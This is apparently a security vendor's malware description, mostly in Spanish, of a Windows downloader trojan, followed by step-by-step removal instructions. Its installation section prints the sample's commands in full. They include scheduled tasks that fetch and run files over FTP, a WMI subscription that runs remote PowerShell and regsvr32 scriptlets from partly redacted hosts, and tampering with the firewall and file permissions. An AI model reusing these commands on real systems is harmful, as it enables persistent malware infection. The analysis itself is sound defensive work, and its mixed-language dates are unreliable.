Modified By:: Arianne Grace Dela Cruz
 

Trojan.VBS.Starter.lr (KASPERSKY); Gen:Variant.Strictor.230978 (BITDEFENDER)

 PLATFORM:

Windows

 OVER ALL RISK RATING:
 DAMAGE POTENTIAL::
 DISTRIBUTION POTENTIAL::
 REPORTED INFECTION:
 INFORMATION EXPOSURE:
Low
Medium
High
Critical

  • Threat Type:
    Trojan

  • Destructiveness:
    No

  • Encrypted:
     

  • In the wild::
    Yes

  OVERVIEW


  TECHNICAL DETAILS

File size: 302,510 bytes
File type: EXE
INITIAL SAMPLES RECEIVED DATE: 28 de listopada de 2019

Instalación

Agrega los procesos siguientes:

  • "%System%\WScript.exe" "%Windows%\inf\n.vbs"
  • %Windows%\inf\n.vbs
  • "%Windows%\inf\c3.bat"
  • %Windows%\inf\c3.bat
  • net1 user mm123$ /del
  • net1 user admin$ /del
  • net1 user sysadm05 /del
  • net stop AnyDesk
  • sc config AnyDesk start= disabled
  • attrib -s -h -r %System Root%\Users\Default\AppData\Local\Temp\*.exe
  • attrib -s -h -r %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe
  • attrib -s -h -r %System Root%\Users\Default\AppData\Roaming\*.exe
  • attrib -s -h -r %System Root%\Users\{username}\AppData\Local\Temp\*.exe
  • attrib -s -h -r %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe
  • attrib -s -h -r %System Root%\Users\{username}\AppData\Roaming\*.exe
  • attrib -s -h -r %User Temp%\*.exe
  • attrib -s -h -r %Application Data%\Tempo\*.exe
  • attrib -s -h -r %Application Data%\*.exe
  • taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe
  • cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d system
  • cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d system
  • cacls "%System Root%\Program Files\autodesk\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\autodesk\*.exe" /e /d system
  • cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d system
  • cacls "%Program Files%\RemoteDesk\*.exe" /e /d everyone
  • cacls "%Program Files%\RemoteDesk\*.exe" /e /d system
  • cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
  • cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d system
  • cacls "%Program Files%\autodesk\*.exe" /e /d everyone
  • cacls "%Program Files%\autodesk\*.exe" /e /d system
  • cacls "%Program Files%\anydesk\*.exe" /e /d system
  • cacls "%Program Files%\anydesk\*.exe" /e /d everyone
  • cacls %Windows%\debug\WIA\*.exe /e /d everyone
  • cacls %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe /e /d everyone
  • cacls %Application Data%\Tempo /e /d everyone
  • cacls %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe /e /d system
  • cacls %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone
  • cacls %Application Data%\Tempo /e /d system
  • cacls %System Root%\Users\Default\AppData\Roaming\Tempo /e /d system
  • cacls %System Root%\Users\Default\AppData\Roaming\Tempo /e /d everyone
  • cacls %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system
  • cacls %System Root%\Users\{username}\AppData\Roaming\*.exe /e /g everyone:f
  • cacls %Application Data% /e /g everyone:f
  • cacls %System Root%\Users\{username}\AppData\Local\Temp /e /g system:f
  • cacls %System Root%\Users\{username}\AppData\Local\Temp /e /g everyone:f
  • cacls %User Temp% /e /g system:f
  • cacls %User Temp% /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Local\Temp /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Roaming /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Roaming /e /g system:f
  • cacls %System Root%\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Roaming\*.exe /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Roaming\*.exe /e /g system:f
  • cacls %System Root%\SysData\*.exe /e /d system
  • cacls %System Root%\Msupdate /e /d system
  • cacls %Windows%\xcecg /e /d system
  • cacls %Windows%\ccm /e /d system
  • cacls %Windows%\smss.exe /e /d system
  • cacls "%System Root%\Program Files\Common Files\Services\*.exe" /e /d system
  • cacls %System%\a.exe /e /d system
  • cacls %Windows%\security\*.exe /e /d system
  • cacls %Windows%\security\*.exe /e /d everyone
  • cacls %Windows%\Resources\*.exe /e /d system
  • cacls %Windows%\Resources\*.exe /e /d everyone
  • cacls %Windows%\Resources\Themes\*.exe /e /d system
  • cacls %Windows%\Resources\Themes\*.exe /e /d everyone
  • %System%\net1 stop AnyDesk
  • cacls %Windows%\system\lsmsm.exe /e /d system
  • cacls %All Users Profile%\homegroup\*.exe /e /d system
  • cacls %All Users Profile%\diskdata\*.exe /e /d system
  • cacls "%Program Files%\Microsoft Updates" /e /d system
  • cacls %System%\servwdrv.dll /e /d system
  • cacls %System%\servwdrv.dll /e /d everyone
  • cacls %System%\servwdrvx.dll /e /d system
  • cacls %System%\servwdrvx.dll /e /d everyone
  • cacls %System%\serwwdrv.dll /e /d system
  • cacls %System%\serwwdrv.dll /e /d everyone
  • cacls %Windows%\svchost.exe /e /d system
  • cacls %All Users Profile%\WmiAppSrv\svchost.exe /e /d system
  • cacls %Windows%\Help\taskhost.exe /e /d system
  • cacls %Windows%\Web\wininit.exe /e /d system
  • cacls %All Users Profile%\Microsoft\WmiAppSvr\csrss.exe /e /d system
  • cacls %Program Files%\Common Files\svshpst.exe /e /d system
  • cacls %Windows%\fonts\system32\svchost.exe /e /d system
  • cacls %Windows%\fonts\*.exe /e /d system
  • cacls %Windows%\Fonts\Microsoft /e /d system
  • cacls "%Windows%\Temp\32p.zip ª¦?¿ó¿¦¿¦í+???? 1\*.*" /e /d system
  • cacls "%Windows%\fonts\*.exe" /e /d system
  • cacls %Windows%\taskmgrs.exe /e /d system
  • cacls %Windows%\security\IIS\*.exe /e /d system
  • cacls %Program Files%\Common Files\System\*.exe /e /d system
  • cacls %Program Files%\dll\*.exe /e /d system
  • cacls %Windows%\Fonts\*.exe /e /d system
  • cacls %Program Files%\Common Files\Services\*.exe /e /d system
  • cacls %Program Files%\Common Files\SpeechEngines\*.exe /e /d system
  • cacls %Windows%\Fonts\system32\*.exe /e /d system
  • cacls %Windows%\SpeechsTracing\*.exe /e /d system
  • cacls "%Program Files%\Microsoft SvidiaTen\*.exe" /e /d system
  • cacLS %Program Files%\Common Files\Micros~1\*.exe /e /d system
  • cacls %System Root%\System\*.exe /e /d system
  • cacls %Windows%\1\*.exe /e /d system
  • cacls %Public%\*.exe /e /d system
  • cacls "%Program Files%\Common Files\conime.exe" /e /d system
  • cacls "%Program Files%\Common Files\conime.exe" /e /d system
  • cacls %Program Files%\test\*.exe /e /d everyone
  • cacls %Windows%\Fonts\help\*.exe /e /d system
  • cacls %Windows%\web\*.exe /e /d system
  • cacls %All Users Profile%\diskdata\*.exe /e /d system
  • cacls "%Program Files%\SQLWriter$\*.exe" /e /d system
  • cacls %Windows%\Prefetch\*.exe /e /d system
  • cacls %All Users Profile%\WmiAppSvr\*.exe /e /d system
  • cacls %Windows%\Fonts\Mysql\*.exe /e /d system
  • cacls %All Users Profile%\WmiAppSvr\*.exe /e /d system
  • cacls %Windows%\SysWOW64\drivers\taskmgr.exe /e /d system
  • cacls %Windows%\SysWOW64\drivers\svchost.exe /e /d system
  • cacls %Windows%\temp\svchost.exe /e /d system
  • cacls %Windows%\Fonts\Windows\*.exe /e /d system
  • cacls %System Root%\Msupdate /e /d system
  • cacls %Windows%\Fonts\Windows\*.exe /e /d system
  • cacls %All Users Profile%\Temp\*.exe /e /d system
  • cacls %Public%\Music\*.exe /e /d everyone
  • cacls %Public%\Music\*.vbs /e /d system
  • cacls %Windows%\Help\lsass.exe /e /d system
  • cacls %Windows%\temp\*.dll /e /d system
  • cacls %Windows%\debug\Nat\*.exe /e /d system
  • cacls %Windows%\Registration\*.exe /e /d system
  • cacls %Application Data%\Tempo\*.exe /e /d everyone
  • cacls "%Program Files%\Microsoft Blliasc\*.*" /e /d system
  • cacls "%Program Files%\Microsoft SvidiaTen\*.exe" /e /d system
  • cacls %Windows%\system\lsaus.exe /e /d system
  • cacls "%All Users Profile%\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • cacls "%All Users Profile%\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • cacls "%All Users Profile%\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system
  • cacls %All Users Profile%\Microsoft\HelpLibrary\*.dll /e /d system
  • cacls %Windows%\WBEM\ccproxy\*.exe /e /d system
  • cacls %All Users Profile%\Microsoft\Network\*.exe /e /d system
  • cacls %Windows%\system\lsmsm.exe /e /d system
  • cacls %Windows%\mysql.log /e /d system
  • %System%\cmd.exe /S /D /c" echo y"
  • %System%\cmd.exe /S /D /c" rd /s /q %Windows%\help\lsmosee.exe"
  • %System%\cmd.exe /S /D /c" echo y"
  • %System%\cmd.exe /S /D /c" rd /s /q %Windows%\debug\lsmosee.exe"
  • net start MSSQLSERVER
  • %System%\net1 start MSSQLSERVER
  • schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.{BLOCKED}e.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe" /ru "system" /sc onstart /F
  • schtasks /create /tn "Mysa1" /tr "rundll32.exe %Windows%\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
  • schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.{BLOCKED}e.info>p&echo test>>p&echo 1433>>p&echo get s.dat %Windows%\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F
  • schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.{BLOCKED}e.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %Windows%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%Windows%\help\lsmosee.exe" /ru "system" /sc onstart /F
  • schtasks /create /tn "ok" /tr "rundll32.exe %Windows%\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
  • wmic process where "name='svchost.exe' and ExecutablePath<>'C:\WINDOWS\system32\svchost.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\svchost.exe'" delete
  • wmic process where "name='wininit.exe' and ExecutablePath<>'C:\WINDOWS\system32\wininit.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\wininit.exe'" delete
  • wmic process where "name='csrss.exe' and ExecutablePath<>'C:\WINDOWS\system32\csrss.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\csrss.exe'" delete
  • wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\WINDOWS\system32\WUDFHosts.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\WUDFHosts.exe'" delete
  • wmic process where "name='services.exe' and ExecutablePath<>'C:\WINDOWS\system32\services.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\services.exe'" delete
  • wmic process where "name='taskhost.exe' and ExecutablePath<>'C:\WINDOWS\system32\taskhost.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\taskhost.exe'" delete
  • wmic datafile where "Name='c:\windows\debug\lsmos.exe'" get Version /value
  • findstr "=1\.0\.0\.1$"
  • %System%\cmd.exe /c wmic process where "ExecutablePath='c:\windows\debug\lsmos.exe'" get ProcessId|findstr "[0-9]"
  • mic process where "ExecutablePath='c:\windows\debug\lsmos.exe'" get ProcessId
  • indstr "[0-9]"
  • SCHTASKS /Delete /TN "WindowsUpdate1" /F
  • SCHTASKS /Delete /TN "WindowsUpdate3" /F
  • SCHTASKS /Delete /TN "Windows_Update" /F
  • SCHTASKS /Delete /TN "Update" /F
  • SCHTASKS /Delete /TN "Update2" /F
  • SCHTASKS /Delete /TN "Update4" /F
  • SCHTASKS /Delete /TN "Update3" /F
  • SCHTASKS /Delete /TN "windowsinit" /F
  • SCHTASKS /Delete /TN "System Security Check" /F
  • SCHTASKS /Delete /TN "AdobeFlashPlayer" /F
  • SCHTASKS /Delete /TN "updat_windows" /F
  • SCHTASKS /Delete /TN "at1" /F
  • SCHTASKS /Delete /TN "at2" /F
  • SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F
  • SCHTASKS /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f
  • SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /F
  • netsh ipsec static delete policy name=win
  • netsh ipsec static delete filterlist name=Allowlist
  • netsh ipsec static delete filterlist name=denylist
  • netsh ipsec static delete filteraction name=allow
  • netsh advfirewall firewall delete rule name="tcp all" dir=in
  • netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
  • netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
  • netsh advfirewall firewall delete rule name="tcpall" dir=out
  • sc config MpsSvc start= auto
  • net start MpsSvc
  • %System%\net1 start MpsSvc
  • netsh advfirewall set allprofiles state on
  • netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
  • netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
  • netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
  • netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
  • netsh ipsec static add policy name=win
  • netsh ipsec static add filterlist name=Allowlist
  • netsh ipsec static add filterlist name=denylist
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
  • netsh ipsec static add filteraction name=Allow action=permit
  • netsh ipsec static add filteraction name=deny action=block
  • netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
  • netsh ipsec static set policy name=win assign=y
  • %System%\cmd.exe /S /D /c" ver "
  • find "5.1."
  • wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckamm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
  • wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckamm4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.{BLOCKED}e.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.158.117:8117/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.250.162:8162/power.txt')||regsvr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.158.117:8117/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.{BLOCKED}e.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://{BLOCKED}.{BLOCKED}.155.170:8170/s.xsl\""
  • cmd /c start wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""
  • wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""

Técnica de inicio automático

Agrega las siguientes entradas de registro para permitir su ejecución automática cada vez que se inicia el sistema:

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
start = "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f

Otras modificaciones del sistema

Agrega las siguientes entradas de registro como parte de la rutina de instalación:

HKEY_CURRENT_USER\Software\WinRAR SFX

Agrega las siguientes entradas de registro:

HKEY_CURRENT_USER\Software\WinRAR SFX
C%%Windows%inf = "%Windows%\inf"

Rutina de infiltración

Infiltra los archivos siguientes:

  • %Windows%\inf\c3.bat
  • %Windows%\inf\n.vbs
  • %Windows%\inf\_tmp_rar_sfx_access_check_3196273

(Nota: %Windows% es la carpeta de Windows, que suele estar en C:\Windows o C:\WINNT).

)

  SOLUTION

Minimum scan engine: 9.850
First VSAPI Pattern File: 15.526.04
First VSAPI Pattern Release Date: 28 de listopada de 2019
VSAPI OPR PATTERN-VERSION: 15.527.00
VSAPI OPR PATTERN DATE: 29 de listopada de 2019

Step 2

Los usuarios de Windows ME y XP, antes de llevar a cabo cualquier exploración, deben comprobar que tienen desactivada la opción Restaurar sistema para permitir la exploración completa del equipo.

Step 3

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 4

Reiniciar en modo seguro

[ learnMore ]

Step 5

Eliminar esta clave del Registro

[ learnMore ]

Importante: si modifica el Registro de Windows incorrectamente, podría hacer que el sistema funcione mal de manera irreversible. Lleve a cabo este paso solo si sabe cómo hacerlo o si puede contar con ayuda de su administrador del sistema. De lo contrario, lea este artículo de Microsoft antes de modificar el Registro del equipo.

  • In HKEY_CURRENT_USER\Software
    • WinRAR SFX

Step 6

Eliminar este valor del Registro

[ learnMore ]

Importante: si modifica el Registro de Windows incorrectamente, podría hacer que el sistema funcione mal de manera irreversible. Lleve a cabo este paso solo si sabe cómo hacerlo o si puede contar con ayuda de su administrador del sistema. De lo contrario, lea este artículo de Microsoft antes de modificar el Registro del equipo.

  • In HKEY_CURRENT_USER\Software\WinRAR SFX
    • C%%Windows%inf = "%Windows%\inf"
  • In HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    • start = "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f

Step 7

Buscar y eliminar estos archivos

[ learnMore ]
Puede que algunos de los archivos del componente estén ocultos. Asegúrese de que tiene activada la casilla Buscar archivos y carpetas ocultos en la opción "Más opciones avanzadas" para que el resultado de la búsqueda incluya todos los archivos y carpetas ocultos.
  • %Windows%\inf\c3.bat
  • %Windows%\inf\n.vbs
  • %Windows%\inf\_tmp_rar_sfx_access_check_3196273

Step 8

Deleting Scheduled Tasks

The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

  • Task Name: Mysa
  • Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe"
  • Task Name: Mysa1
  • Task to be run: "rundll32.exe %Windows%\debug\item.dat,ServiceMain aaaa"
  • Task Name: Mysa2
  • Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>p&echo test>>p&echo 1433>>p&echo get s.dat %Windows%\debug\item.dat>>p&echo bye>>p&ftp -s:p"
  • Task Name: Mysa3
  • Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %Windows%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%Windows%\help\lsmosee.exe"
  • Task Name: ok
  • Task to be run: "rundll32.exe %Windows%\debug\ok.dat,ServiceMain aaaa

For Windows 2000, Windows XP, and Windows Server 2003:

  1. Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
    System Tools>Scheduled Tasks.
  2. Locate each {Task Name} values listed above in the Name column.
  3. Right-click on the said file(s) with the aforementioned value.
  4. Click on Properties. In the Run field, check for the listed {Task to be run}.
  5. If the strings match the list above, delete the task.

For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:

  1. Open the Windows Task Scheduler. To do this:
    • On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
    • On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
  2. In the left panel, click Task Scheduler Library.
  3. In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
  4. In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
  5. If the said string is found, delete the task.

Step 9

Reinicie en modo normal y explore el equipo con su producto de Trend Micro para buscar los archivos identificados como Trojan.Win32.DLOADR.AUSUSN En caso de que el producto de Trend Micro ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no serán necesarios más pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta página de Base de conocimientos para obtener más información.


Did this description help? Tell us how we did.